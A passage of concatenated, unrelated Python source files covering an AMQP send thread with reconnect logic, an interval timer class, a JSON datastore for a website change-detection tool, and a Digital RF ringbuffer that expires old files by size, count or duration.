def __send_run(self):
"""Send request thread
"""
while not self.__end.is_set():
try:
with Connection(userid=self.__prefix + self.__epid,
password=self.__passwd,
virtual_host=self.__vhost,
heartbeat=self.__heartbeat,
connect_timeout=self.__socket_timeout,
operation_timeout=self.__socket_timeout,
ssl=self.__get_ssl_context(self.__sslca),
host=self.__host) as conn,\
conn.channel(auto_encode_decode=False) as channel:
self.__send_channel = channel
self.__send_exc_clear(log_if_exc_set='reconnected')
self.__send_ready.set()
try:
self.__send_ready_callback(self.__send_exc_time)
while not self.__end.is_set():
with self.__send_lock:
try:
# deal with any incoming messages (AMQP protocol only, not QAPI)
conn.drain_events(0)
except (BlockingIOError, SocketTimeout):
pass
conn.heartbeat_tick()
# idle
self.__end.wait(.25)
finally:
# locked so can make sure another call to send() is not made whilst shutting down
with self.__send_lock:
self.__send_ready.clear()
except exceptions.AccessRefused:
self.__send_log_set_exc_and_wait('Access Refused (Credentials already in use?)')
except exceptions.ConnectionForced:
self.__send_log_set_exc_and_wait('Disconnected by broker (ConnectionForced)')
except SocketTimeout:
self.__send_log_set_exc_and_wait('SocketTimeout exception. wrong credentials, vhost or prefix?')
except SSLError:
self.__send_log_set_exc_and_wait('ssl.SSLError Bad Certificate?')
except (exceptions.AMQPError, SocketError):
self.__send_log_set_exc_and_wait('amqp/transport failure, sleeping before retry')
except:
self.__send_log_set_exc_and_wait('unexpected failure, exiting', wait_seconds=0)
break
logger.debug('finished')
def __send_log_set_exc_and_wait(self, msg, wait_seconds=None):
"""To be called in exception context only.
msg - message to log
wait_seconds - how long to pause for (so retry is not triggered immediately)
"""
logger.log(
(
logging.ERROR if self.__send_ready.time_since_last_clear >= self.__conn_error_log_threshold else
logging.WARNING
),
msg,
exc_info=DEBUG_ENABLED
)
self.__send_exc_time = monotonic()
self.__send_exc = exc_info()[1]
self.__end.wait(self.__conn_retry_delay if wait_seconds is None else wait_seconds)
def __send_exc_clear(self, log_if_exc_set=None):
"""Clear send exception and time. If exception was previously was set, optionally log log_if_exc_set at INFO
level.
"""
if not (log_if_exc_set is None or self.__send_exc is None):
logger.info(log_if_exc_set)
self.__send_exc_time = None
self.__send_exc = None
|
SetInterval.py
|
import logging
import threading
import time
from typing import Any
class SetInterval:
def __init__(self, interval: float, action: Any) -> None:
"""コンストラクタ
Args:
interval (float): 呼び出し間隔
action (Any): 呼ぶ出す関数
"""
logging.info("init")
self.interval = interval
self.action = action
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.__set_interval)
self.thread.start()
def __set_interval(self) -> None:
"""スレッド処理"""
next_time = time.time() + self.interval
while not self.stopEvent.wait(next_time - time.time()):
next_time += self.interval
self.action()
# t.daemon = True
def cancel(self) -> None:
"""スレッドを止める"""
logging.info("cancel")
self.stopEvent.set()
|
store.py
|
from os import unlink, path, mkdir
import json
import uuid as uuid_builder
from threading import Lock
from copy import deepcopy
import logging
import time
import threading
# Is there an existing library to ensure some data store (JSON etc) is in sync with CRUD methods?
# Open a github issue if you know something :)
# https://stackoverflow.com/questions/6190468/how-to-trigger-function-on-value-change
class ChangeDetectionStore:
lock = Lock()
def __init__(self, datastore_path="/datastore", include_default_watches=True, version_tag="0.0.0"):
self.needs_write = False
self.datastore_path = datastore_path
self.json_store_path = "{}/url-watches.json".format(self.datastore_path)
self.stop_thread = False
self.__data = {
'note': "Hello! If you change this file manually, please be sure to restart your changedetection.io instance!",
'watching': {},
'settings': {
'headers': {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate', # No support for brolti in python requests yet.
'Accept-Language': 'en-GB,en-US;q=0.9,en;'
},
'requests': {
'timeout': 15, # Default 15 seconds
'minutes_between_check': 3 * 60, # Default 3 hours
'workers': 10 # Number of threads, lower is better for slow connections
},
'application': {
'password': False,
'extract_title_as_title': False,
'fetch_backend': 'html_requests',
'notification_urls': [], # Apprise URL list
# Custom notification content
'notification_title': 'ChangeDetection.io Notification - {watch_url}',
'notification_body': '{watch_url} had a change.'
}
}
}
# Base definition for all watchers
self.generic_definition = {
'url': None,
'tag': None,
'last_checked': 0,
'last_changed': 0,
'paused': False,
'last_viewed': 0, # history key value of the last viewed via the [diff] link
'newest_history_key': "",
'title': None,
# Re #110, so then if this is set to None, we know to use the default value instead
# Requires setting to None on submit if it's the same as the default
'minutes_between_check': None,
'previous_md5': "",
'uuid': str(uuid_builder.uuid4()),
'headers': {}, # Extra headers to send
'history': {}, # Dict of timestamp and output stripped filename
'ignore_text': [], # List of text to ignore when calculating the comparison checksum
'notification_urls': [], # List of URLs to add to the notification Queue (Usually AppRise)
'css_filter': "",
'trigger_text': [], # List of text or regex to wait for until a change is detected
'fetch_backend': None,
}
if path.isfile('changedetectionio/source.txt'):
with open('changedetectionio/source.txt') as f:
# Should be set in Dockerfile to look for /source.txt , this will give us the git commit #
# So when someone gives us a backup file to examine, we know exactly what code they were running.
self.__data['build_sha'] = f.read()
try:
# @todo retest with ", encoding='utf-8'"
with open(self.json_store_path) as json_file:
from_disk = json.load(json_file)
# @todo isnt there a way todo this dict.update recursively?
# Problem here is if the one on the disk is missing a sub-struct, it wont be present anymore.
if 'watching' in from_disk:
self.__data['watching'].update(from_disk['watching'])
if 'app_guid' in from_disk:
self.__data['app_guid'] = from_disk['app_guid']
if 'settings' in from_disk:
if 'headers' in from_disk['settings']:
self.__data['settings']['headers'].update(from_disk['settings']['headers'])
if 'requests' in from_disk['settings']:
self.__data['settings']['requests'].update(from_disk['settings']['requests'])
if 'application' in from_disk['settings']:
self.__data['settings']['application'].update(from_disk['settings']['application'])
# Reinitialise each `watching` with our generic_definition in the case that we add a new var in the future.
# @todo pretty sure theres a python we todo this with an abstracted(?) object!
for uuid, watch in self.__data['watching'].items():
_blank = deepcopy(self.generic_definition)
_blank.update(watch)
self.__data['watching'].update({uuid: _blank})
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
print("Watching:", uuid, self.__data['watching'][uuid]['url'])
# First time ran, doesnt exist.
except (FileNotFoundError, json.decoder.JSONDecodeError):
if include_default_watches:
print("Creating JSON store at", self.datastore_path)
self.add_watch(url='http://www.quotationspage.com/random.php', tag='test')
self.add_watch(url='https://news.ycombinator.com/', tag='Tech news')
self.add_watch(url='https://www.gov.uk/coronavirus', tag='Covid')
self.add_watch(url='https://changedetection.io', tag='Tech news')
self.__data['version_tag'] = version_tag
# Helper to remove password protection
password_reset_lockfile = "{}/removepassword.lock".format(self.datastore_path)
if path.isfile(password_reset_lockfile):
self.__data['settings']['application']['password'] = False
unlink(password_reset_lockfile)
if not 'app_guid' in self.__data:
import sys
import os
if "pytest" in sys.modules or "PYTEST_CURRENT_TEST" in os.environ:
self.__data['app_guid'] = "test-" + str(uuid_builder.uuid4())
else:
self.__data['app_guid'] = str(uuid_builder.uuid4())
self.needs_write = True
# Finally start the thread that will manage periodic data saves to JSON
save_data_thread = threading.Thread(target=self.save_datastore).start()
# Returns the newest key, but if theres only 1 record, then it's counted as not being new, so return 0.
def get_newest_history_key(self, uuid):
if len(self.__data['watching'][uuid]['history']) == 1:
return 0
dates = list(self.__data['watching'][uuid]['history'].keys())
# Convert to int, sort and back to str again
dates = [int(i) for i in dates]
dates.sort(reverse=True)
if len(dates):
# always keyed as str
return str(dates[0])
return 0
def set_last_viewed(self, uuid, timestamp):
self.data['watching'][uuid].update({'last_viewed': int(timestamp)})
self.needs_write = True
def update_watch(self, uuid, update_obj):
# Skip if 'paused' state
if self.__data['watching'][uuid]['paused']:
return
with self.lock:
# In python 3.9 we have the |= dict operator, but that still will lose data on nested structures...
for dict_key, d in self.generic_definition.items():
if isinstance(d, dict):
if update_obj is not None and dict_key in update_obj:
self.__data['watching'][uuid][dict_key].update(update_obj[dict_key])
del (update_obj[dict_key])
self.__data['watching'][uuid].update(update_obj)
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
self.needs_write = True
@property
def data(self):
has_unviewed = False
for uuid, v in self.__data['watching'].items():
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
if int(v['newest_history_key']) <= int(v['last_viewed']):
self.__data['watching'][uuid]['viewed'] = True
else:
self.__data['watching'][uuid]['viewed'] = False
has_unviewed = True
# #106 - Be sure this is None on empty string, False, None, etc
if not self.__data['watching'][uuid]['title']:
self.__data['watching'][uuid]['title'] = None
# Default var for fetch_backend
if not self.__data['watching'][uuid]['fetch_backend']:
self.__data['watching'][uuid]['fetch_backend'] = self.__data['settings']['application']['fetch_backend']
self.__data['has_unviewed'] = has_unviewed
return self.__data
def get_all_tags(self):
tags = []
for uuid, watch in self.data['watching'].items():
# Support for comma separated list of tags.
for tag in watch['tag'].split(','):
tag = tag.strip()
if tag not in tags:
tags.append(tag)
tags.sort()
return tags
def unlink_history_file(self, path):
try:
unlink(path)
except (FileNotFoundError, IOError):
pass
# Delete a single watch by UUID
def delete(self, uuid):
with self.lock:
if uuid == 'all':
self.__data['watching'] = {}
# GitHub #30 also delete history records
for uuid in self.data['watching']:
for path in self.data['watching'][uuid]['history'].values():
self.unlink_history_file(path)
else:
for path in self.data['watching'][uuid]['history'].values():
self.unlink_history_file(path)
del self.data['watching'][uuid]
self.needs_write = True
def url_exists(self, url):
# Probably their should be dict...
for watch in self.data['watching'].values():
if watch['url'] == url:
return True
return False
def get_val(self, uuid, val):
# Probably their should be dict...
return self.data['watching'][uuid].get(val)
# Remove a watchs data but keep the entry (URL etc)
def scrub_watch(self, uuid, limit_timestamp = False):
import hashlib
del_timestamps = []
changes_removed = 0
for timestamp, path in self.data['watching'][uuid]['history'].items():
if not limit_timestamp or (limit_timestamp is not False and int(timestamp) > limit_timestamp):
self.unlink_history_file(path)
del_timestamps.append(timestamp)
changes_removed += 1
if not limit_timestamp:
self.data['watching'][uuid]['last_checked'] = 0
self.data['watching'][uuid]['last_changed'] = 0
self.data['watching'][uuid]['previous_md5'] = 0
for timestamp in del_timestamps:
del self.data['watching'][uuid]['history'][str(timestamp)]
# If there was a limitstamp, we need to reset some meta data about the entry
# This has to happen after we remove the others from the list
if limit_timestamp:
newest_key = self.get_newest_history_key(uuid)
if newest_key:
self.data['watching'][uuid]['last_checked'] = int(newest_key)
# @todo should be the original value if it was less than newest key
self.data['watching'][uuid]['last_changed'] = int(newest_key)
try:
with open(self.data['watching'][uuid]['history'][str(newest_key)], "rb") as fp:
content = fp.read()
self.data['watching'][uuid]['previous_md5'] = hashlib.md5(content).hexdigest()
except (FileNotFoundError, IOError):
self.data['watching'][uuid]['previous_md5'] = False
pass
self.needs_write = True
return changes_removed
def add_watch(self, url, tag):
with self.lock:
# @todo use a common generic version of this
new_uuid = str(uuid_builder.uuid4())
_blank = deepcopy(self.generic_definition)
_blank.update({
'url': url,
'tag': tag,
'uuid': new_uuid
})
self.data['watching'][new_uuid] = _blank
# Get the directory ready
output_path = "{}/{}".format(self.datastore_path, new_uuid)
try:
mkdir(output_path)
except FileExistsError:
print(output_path, "already exists.")
self.sync_to_json()
return new_uuid
# Save some text file to the appropriate path and bump the history
# result_obj from fetch_site_status.run()
def save_history_text(self, watch_uuid, contents):
import uuid
output_path = "{}/{}".format(self.datastore_path, watch_uuid)
fname = "{}/{}.stripped.txt".format(output_path, uuid.uuid4())
with open(fname, 'wb') as f:
f.write(contents)
f.close()
return fname
def sync_to_json(self):
print("Saving..")
data ={}
try:
data = deepcopy(self.__data)
except RuntimeError:
time.sleep(0.5)
print ("! Data changed when writing to JSON, trying again..")
self.sync_to_json()
return
else:
with open(self.json_store_path, 'w') as json_file:
json.dump(data, json_file, indent=4)
logging.info("Re-saved index")
self.needs_write = False
# Thread runner, this helps with thread/write issues when there are many operations that want to update the JSON
# by just running periodically in one thread, according to python, dict updates are threadsafe.
def save_datastore(self):
while True:
if self.stop_thread:
print("Shutting down datastore thread")
return
if self.needs_write:
self.sync_to_json()
time.sleep(3)
# Go through the datastore path and remove any snapshots that are not mentioned in the index
# This usually is not used, but can be handy.
def remove_unused_snapshots(self):
print ("Removing snapshots from datastore that are not in the index..")
index=[]
for uuid in self.data['watching']:
for id in self.data['watching'][uuid]['history']:
index.append(self.data['watching'][uuid]['history'][str(id)])
import pathlib
# Only in the sub-directories
for item in pathlib.Path(self.datastore_path).rglob("*/*txt"):
if not str(item) in index:
print ("Removing",item)
unlink(item)
|
ringbuffer.py
|
# ----------------------------------------------------------------------------
# Copyright (c) 2017 Massachusetts Institute of Technology (MIT)
# All rights reserved.
#
# Distributed under the terms of the BSD 3-clause license.
#
# The full license is in the LICENSE file, distributed with this software.
# ----------------------------------------------------------------------------
"""Module for watching a directory and deleting the oldest Digital RF files."""
from __future__ import absolute_import, division, print_function
import datetime
import errno
import os
import re
import sys
import threading
import time
import traceback
from collections import OrderedDict, defaultdict, deque, namedtuple
from . import list_drf, util, watchdog_drf
__all__ = ("DigitalRFRingbufferHandler", "DigitalRFRingbuffer")
class DigitalRFRingbufferHandlerBase(watchdog_drf.DigitalRFEventHandler):
"""Base event handler for implementing a ringbuffer of Digital RF files.
This handler tracks files but does nothing to expire them. At least one
expirer mixin must be used with this class in order to create a complete
ringbuffer.
"""
FileRecord = namedtuple("FileRecord", ("key", "size", "path", "group"))
def __init__(
self,
verbose=False,
dryrun=False,
starttime=None,
endtime=None,
include_drf=True,
include_dmd=True,
):
"""Create a ringbuffer handler.
Other Parameters
----------------
starttime : datetime.datetime
Data covering this time or after will be included. This has no
effect on property files.
endtime : datetime.datetime
Data covering this time or earlier will be included. This has no
effect on property files.
include_drf : bool
If True, include Digital RF files.
include_dmd : bool
If True, include Digital Metadata files.
"""
self.verbose = verbose
self.dryrun = dryrun
# separately track file groups (ch path, name) with different queues
self.queues = defaultdict(deque)
self.records = {}
# acquire the record lock to modify the queue or record dicts
self._record_lock = threading.RLock()
super(DigitalRFRingbufferHandlerBase, self).__init__(
starttime=starttime,
endtime=endtime,
include_drf=include_drf,
include_dmd=include_dmd,
include_drf_properties=False,
include_dmd_properties=False,
)
def status(self):
"""Return status string about state of the ringbuffer."""
nfiles = sum(len(q) for q in self.queues.values())
return "{0} files".format(nfiles)
def _get_file_record(self, path):
"""Return self.FileRecord tuple for file at path."""
# get time key (seconds) from file path
key = None
for r in self.regexes:
m = r.match(path)
try:
secs = int(m.group("secs"))
except (AttributeError, IndexError, TypeError):
# no match, or regex matched but there is no 'secs' in regex
continue
else:
try:
frac = int(m.group("frac"))
except (IndexError, TypeError):
frac = 0
# key is time in milliseconds
key = secs * 1000 + frac
break
if key is None:
return
# ringbuffer by file groups, which are a channel path and name
group = (m.group("chpath"), m.group("name"))
try:
stat = os.stat(path)
except OSError:
if self.verbose:
traceback.print_exc()
return
else:
size = stat.st_size
return self.FileRecord(key=key, size=size, path=path, group=group)
def _add_to_queue(self, rec):
"""Add record to queue."""
# find insertion index for record (queue sorted in ascending order)
# we expect new records to go near the end (most recent)
queue = self.queues[rec.group]
with self._record_lock:
for k, (kkey, kpath) in enumerate(reversed(queue)):
if rec.key > kkey:
# we've found the insertion point at index k from end
break
elif rec.path == kpath:
# already in ringbuffer, so simply return
return
else:
# new key is oldest (or queue is empty),
# needs to be put at beginning
queue.appendleft((rec.key, rec.path))
k = None
if k is not None:
# insert record at index k
queue.rotate(k)
queue.append((rec.key, rec.path))
queue.rotate(-k)
def _remove_from_queue(self, rec):
"""Remove record from queue."""
queue = self.queues[rec.group]
with self._record_lock:
queue.remove((rec.key, rec.path))
def _expire_oldest_from_group(self, group):
"""Expire oldest record from group and delete corresponding file."""
# oldest file is at start of sorted records deque
# (don't just popleft on the queue because we want to call
# _remove_from_queue, which is overridden by subclasses)
with self._record_lock:
key, path = self.queues[group][0]
rec = self.records.pop(path)
self._remove_from_queue(rec)
if self.verbose:
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Expired {1}".format(now, rec.path))
# delete file
if not self.dryrun:
try:
os.remove(rec.path)
except EnvironmentError as e:
# Python 2 and 3 compatible substitute for FileNotFoundError
if e.errno == errno.ENOENT:
# path doesn't exist like we thought it did, oh well
if self.verbose:
traceback.print_exc()
else:
# try again if path still exists, otherwise it's ok to move on
if os.path.exists(rec.path):
os.remove(rec.path)
# try to clean up directory in case it is empty
head, tail = os.path.split(rec.path)
try:
os.rmdir(head)
except OSError:
# directory not empty, just move on
pass
def _expire(self, group):
"""Expire records until ringbuffer constraint is met."""
# must override with mixins for any expiration to occur
pass
def _add_record(self, rec):
"""Add a record to the ringbuffer and expire old ones if necesssary."""
with self._record_lock:
# make sure record does not already exist, remove if it does
if rec.path in self.records:
if self.verbose:
msg = (
"Adding record for {0} but it already exists in"
" ringbuffer, modify instead."
).format(rec.path)
print(msg)
self._modify_record(rec)
# add record to dict so record information can be looked up by path
self.records[rec.path] = rec
# add record to expiration queue
self._add_to_queue(rec)
if self.verbose:
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Added {1}".format(now, rec.path))
# expire oldest files until size constraint is met
self._expire(rec.group)
def _modify_record(self, rec):
"""Modify a record in the ringbuffer, return whether it was done."""
with self._record_lock:
if rec.path not in self.records:
# don't have record in ringbuffer when we should, add instead
if self.verbose:
msg = (
"Missing modified file {0} from ringbuffer, adding" " instead."
).format(rec.path)
print(msg)
self._add_record(rec)
return True
# nothing to do otherwise
return False
def _remove_record(self, path):
"""Remove a record from the ringbuffer."""
# get and remove record id if path is in the ringbuffer, return if not
with self._record_lock:
try:
rec = self.records.pop(path)
except KeyError:
# we probably got here from a FileDeletedEvent after expiring
# an old record, but in any case, no harm to just ignore
return
# remove record from ringbuffer
self._remove_from_queue(rec)
if self.verbose:
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Removed {1}".format(now, rec.path))
def add_files(self, paths, sort=True):
"""Create file records from paths and add to ringbuffer."""
# get records and add from oldest to newest by key (time)
records = (self._get_file_record(p) for p in paths)
# filter out invalid paths (can't extract a time, doesn't exist)
records = (r for r in records if r is not None)
if sort:
records = sorted(records)
for rec in records:
self._add_record(rec)
def modify_files(self, paths, sort=True):
"""Create file records from paths and update in ringbuffer."""
# get records and add from oldest to newest by key (time)
records = (self._get_file_record(p) for p in paths)
# filter out invalid paths (can't extract a time, doesn't exist)
records = (r for r in records if r is not None)
if sort:
records = sorted(records)
for rec in records:
self._modify_record(rec)
def remove_files(self, paths):
"""Retrieve file records from paths and remove from ringbuffer."""
for p in paths:
self._remove_record(p)
def on_created(self, event):
"""Add new file to ringbuffer."""
self.add_files([event.src_path])
def on_deleted(self, event):
"""Remove file from ringbuffer if it was deleted externally."""
self.remove_files([event.src_path])
def on_modified(self, event):
"""Update modified file in ringbuffer."""
self.modify_files([event.src_path])
def on_moved(self, event):
"""Track moved file in ringbuffer."""
self.remove_files([event.src_path])
self.add_files([event.dest_path])
class CountExpirer(object):
"""Ringbuffer handler mixin to track the number of files in each channel.
When the count threshold of a channel is exceeded, the oldest files in that
channel are deleted until the count constraint is met.
"""
def __init__(self, *args, **kwargs):
"""Create a ringbuffer handler."""
self.count = kwargs.pop("count")
super(CountExpirer, self).__init__(*args, **kwargs)
def status(self):
"""Return status string about state of the ringbuffer."""
status = super(CountExpirer, self).status()
try:
max_count = max(len(q) for q in self.queues.values())
except ValueError:
max_count = 0
pct_full = int(float(max_count) / self.count * 100)
return ", ".join((status, "{0}% count".format(pct_full)))
def _expire(self, group):
"""Expire records until file count constraint is met."""
with self._record_lock:
queue = self.queues[group]
while len(queue) > self.count:
self._expire_oldest_from_group(group)
super(CountExpirer, self)._expire(group)
class SizeExpirer(object):
"""Ringbuffer handler mixin to track the space used by all channels.
This expirer tracks the amount of space that new or modified files consume
for all channels together. When the space threshold is exceeded, the oldest
file of any channel is deleted (unless it would empty the channel) until
the size constraint is met.
"""
def __init__(self, *args, **kwargs):
"""Create a ringbuffer handler."""
self.size = kwargs.pop("size")
self.active_size = 0
super(SizeExpirer, self).__init__(*args, **kwargs)
def status(self):
"""Return status string about state of the ringbuffer."""
status = super(SizeExpirer, self).status()
pct_full = int(float(self.active_size) / self.size * 100)
return ", ".join((status, "{0}% size".format(pct_full)))
def _add_to_queue(self, rec):
"""Add record to queue, tracking file size."""
with self._record_lock:
super(SizeExpirer, self)._add_to_queue(rec)
self.active_size += rec.size
def _remove_from_queue(self, rec):
"""Remove record from queue, tracking file size."""
with self._record_lock:
super(SizeExpirer, self)._remove_from_queue(rec)
self.active_size -= rec.size
def _expire_oldest(self, group):
"""Expire oldest record overall, preferring group if tied."""
with self._record_lock:
# remove oldest regardless of group unless it would empty group,
# but prefer `group` if tie
removal_group = group
# oldest file is at start of sorted records deque
try:
oldest_key, oldest_path = self.queues[group][0]
except IndexError:
oldest_key = float("inf")
for grp in self.queues.keys():
if grp != group:
queue = self.queues[grp]
if len(queue) > 1:
key, path = queue[0]
if key < oldest_key:
oldest_key = key
removal_group = grp
self._expire_oldest_from_group(removal_group)
def _expire(self, group):
"""Expire records until overall file size constraint is met."""
with self._record_lock:
while self.active_size > self.size:
self._expire_oldest(group)
super(SizeExpirer, self)._expire(group)
def _modify_record(self, rec):
"""Modify a record in the ringbuffer."""
with self._record_lock:
# have parent handle cases where we actually need to add or delete
handled = super(SizeExpirer, self)._modify_record(rec)
if not handled:
# if we're here, we know that the record exists and needs to
# be modified (in this case, update the size)
oldrec = self.records[rec.path]
self.records[rec.path] = rec
self.active_size -= oldrec.size
self.active_size += rec.size
if self.verbose:
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Updated {1}".format(now, rec.path))
class TimeExpirer(object):
"""Ringbuffer handler mixin to track the time span of each channel.
This handler tracks the sample timestamp of files in each channel. When the
duration threshold of a channel is exceeded (newest timestamp minus
oldest), the oldest files in the channel are deleted until the duration
constraint is met.
"""
def __init__(self, *args, **kwargs):
"""Create a ringbuffer handler."""
# duration is time span in milliseconds
self.duration = kwargs.pop("duration")
super(TimeExpirer, self).__init__(*args, **kwargs)
@staticmethod
def _queue_duration(queue):
"""Get time span in milliseconds of files in a queue."""
try:
oldkey, _ = queue[0]
newkey, _ = queue[-1]
except IndexError:
return 0
return newkey - oldkey
def status(self):
"""Return status string about state of the ringbuffer."""
status = super(TimeExpirer, self).status()
try:
max_duration = max(self._queue_duration(q) for q in self.queues.values())
except ValueError:
max_duration = 0
pct_full = int(float(max_duration) / self.duration * 100)
return ", ".join((status, "{0}% duration".format(pct_full)))
def _expire(self, group):
"""Expire records until time span constraint is met."""
with self._record_lock:
queue = self.queues[group]
while self._queue_duration(queue) > self.duration:
self._expire_oldest_from_group(group)
super(TimeExpirer, self)._expire(group)
def DigitalRFRingbufferHandler(size=None, count=None, duration=None, **kwargs):
"""Create ringbuffer handler given constraints.
Parameters
----------
size : float | int | None
Size of the ringbuffer in bytes. Negative values are used to
indicate all available space except the given amount. If None, no
size constraint is used.
count : int | None
Maximum number of files *for each channel*. If None, no count
constraint is used.
duration : int | float | None
Maximum time span *for each channel* in milliseconds. If None, no
duration constraint is used.
Other Parameters
----------------
verbose : bool
If True, print debugging info about the files that are created and
deleted and how much space they consume.
dryrun : bool
If True, do not actually delete files when expiring them from the
ringbuffer. Use for testing only!
starttime : datetime.datetime
Data covering this time or after will be included. This has no
effect on property files.
endtime : datetime.datetime
Data covering this time or earlier will be included. This has no
effect on property files.
include_drf : bool
If True, include Digital RF files. If False, ignore Digital RF
files.
include_dmd : bool
If True, include Digital Metadata files. If False, ignore Digital
Metadata files.
"""
if size is None and count is None and duration is None:
errstr = "One of `size`, `count`, or `duration` must not be None."
raise ValueError(errstr)
bases = (DigitalRFRingbufferHandlerBase,)
# add mixins in this particular order for expected results
if size is not None:
bases = (SizeExpirer,) + bases
kwargs["size"] = size
if duration is not None:
bases = (TimeExpirer,) + bases
kwargs["duration"] = duration
if count is not None:
bases = (CountExpirer,) + bases
kwargs["count"] = count
# now create the class with the desired mixins
docstring = """Event handler for implementing a ringbuffer of Digital RF files.
This class inherits from a base class (DigitalRFRingbufferHandlerBase)
and some expirer mixins determined from the class factor arguments.
The expirers determine when a file needs to be expired from the
ringbuffer based on size, count, or duration constraints.
"""
cls = type("DigitalRFRingbufferHandler", bases, {"__doc__": docstring})
return cls(**kwargs)
class DigitalRFRingbuffer(object):
"""Monitor a directory and delete old Digital RF files when space is full.
This class combines an event handler and a file system observer. It
monitors a directory and its subdirectories for new Digital RF and Digital
Metadata files. When the ringbuffer threshold in size, count, or duration
is exceeded, the oldest files are deleted until the constraint is met.
"""
def __init__(
self,
path,
size=-200e6,
count=None,
duration=None,
verbose=False,
status_interval=10,
dryrun=False,
starttime=None,
endtime=None,
include_drf=True,
include_dmd=True,
force_polling=False,
):
"""Create Digital RF ringbuffer object. Use start/run method to begin.
Parameters
----------
path : str
Directory in which the ringbuffer is enforced.
size : float | int | None
Size of the ringbuffer in bytes. Negative values are used to
indicate all available space except the given amount. If None, no
size constraint is used.
count : int | None
Maximum number of files *for each channel*. If None, no count
constraint is used.
duration : int | float | None
Maximum time span *for each channel* in milliseconds. If None, no
duration constraint is used.
Other Parameters
----------------
verbose : bool
If True, print debugging info about the files that are created and
deleted and how much space they consume.
status_interval : None | int
Interval in seconds between printing of status updates. If None,
do not print status updates.
dryrun : bool
If True, do not actually delete files when expiring them from the
ringbuffer. Use for testing only!
starttime : datetime.datetime
Data covering this time or after will be included. This has no
effect on property files.
endtime : datetime.datetime
Data covering this time or earlier will be included. This has no
effect on property files.
include_drf : bool
If True, include Digital RF files. If False, ignore Digital RF
files.
include_dmd : bool
If True, include Digital Metadata files. If False, ignore Digital
Metadata files.
force_polling : bool
If True, force the watchdog to use polling instead of the default
observer.
"""
self.path = os.path.abspath(path)
self.size = size
self.count = count
self.duration = duration
self.verbose = verbose
self.status_interval = status_interval
self.dryrun = dryrun
self.starttime = starttime
self.endtime = endtime
self.include_drf = include_drf
self.include_dmd = include_dmd
self.force_polling = force_polling
self._start_time = None
self._task_threads = []
if self.size is None and self.count is None and self.duration is None:
errstr = "One of `size`, `count`, or `duration` must not be None."
raise ValueError(errstr)
if not self.include_drf and not self.include_dmd:
errstr = "One of `include_drf` or `include_dmd` must be True."
raise ValueError(errstr)
if self.status_interval is None:
self.status_interval = float("inf")
if self.size is not None:
if self.size < 0:
# get available space and reduce it by the (negative) size
# value to get the actual size to use
root = self.path
while not os.path.isdir(root):
root = os.path.dirname(root)
statvfs = os.statvfs(root)
bytes_available = statvfs.f_frsize * statvfs.f_bavail
if os.path.isdir(self.path):
existing = list_drf.ilsdrf(
self.path,
starttime=self.starttime,
endtime=self.endtime,
include_drf=self.include_drf,
include_dmd=self.include_dmd,
include_drf_properties=False,
include_dmd_properties=False,
)
for p in existing:
try:
bytes_available += os.path.getsize(p)
except OSError:
# catch instances where file no longer exists
if self.verbose:
traceback.print_exc()
return
self.size = max(bytes_available + self.size, 0)
self.event_handler = DigitalRFRingbufferHandler(
size=self.size,
count=self.count,
duration=self.duration,
verbose=self.verbose,
dryrun=self.dryrun,
starttime=self.starttime,
endtime=self.endtime,
include_drf=self.include_drf,
include_dmd=self.include_dmd,
)
self._init_observer()
def _init_observer(self):
self.observer = watchdog_drf.DirWatcher(
self.path, force_polling=self.force_polling
)
self.observer.schedule(self.event_handler, self.path, recursive=True)
def _add_existing_files(self):
"""Add existing files on disk to ringbuffer."""
# since expiration will always remove the oldest files by sample index,
# and the handler has exception handling for duplicate / out of order events,
# we can add the existing files while the watch is handling events and the
# ringbuffer will still be good (with maybe some error messages when verbose)
# add existing files to ringbuffer handler
existing = list_drf.ilsdrf(
self.path,
starttime=self.starttime,
endtime=self.endtime,
include_drf=self.include_drf,
include_dmd=self.include_dmd,
include_drf_properties=False,
include_dmd_properties=False,
)
# do not sort because existing will already be sorted and we
# don't want to convert to a list
self.event_handler.add_files(existing, sort=False)
def start(self):
"""Start ringbuffer process."""
self._start_time = datetime.datetime.utcnow().replace(microsecond=0)
# start observer to add new files
self.observer.start()
if self.dryrun:
print("DRY RUN (files will not be deleted):")
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Starting {1}:".format(now, self))
sys.stdout.flush()
# add files that already existed before the observer started
# (do it in another thread so we can get to join())
thread = threading.Thread(target=self._add_existing_files)
thread.daemon = True
thread.start()
self._task_threads.append(thread)
def _verify_ringbuffer_files(self, inbuffer):
"""Verify ringbuffer's `inbuffer` set of files with files on disk."""
# get set of all files that should be in the ringbuffer right away
# so we duplicate as few files from new events as possible
# events that happen while we build this file set can be duplicated
# when we verify the ringbuffer state below, but that's ok
ondisk = set(
list_drf.ilsdrf(
self.path,
starttime=self.starttime,
endtime=self.endtime,
include_drf=self.include_drf,
include_dmd=self.include_dmd,
include_drf_properties=False,
include_dmd_properties=False,
)
)
# now any file in inbuffer that is not in ondisk is a missed or
# duplicate deletion event, so remove those files
deletions = inbuffer - ondisk
self.event_handler.remove_files(deletions)
# any file in ondisk that is not in inbuffer is a missed or duplicate
# creation event, so add those files
creations = ondisk - deletions
self.event_handler.add_files(creations, sort=True)
# any file in both ondisk and inbuffer could have a missed modify
# event, so trigger a modify event for those files
possibly_modified = inbuffer & ondisk
self.event_handler.modify_files(possibly_modified, sort=True)
def _restart(self):
"""Restart observer using existing event handlers."""
# get list of files currently in ringbuffer before we modify it
# so we can detect missed events from after crash until ondisk
# file list is complete
inbuffer = set(self.event_handler.records.keys())
# make a new observer and start it ASAP
self._init_observer()
self.observer.start()
# verify existing state of ringbuffer
# (do it in another thread so we can get to join())
thread = threading.Thread(
target=self._verify_ringbuffer_files, kwargs=dict(inbuffer=inbuffer)
)
thread.daemon = True
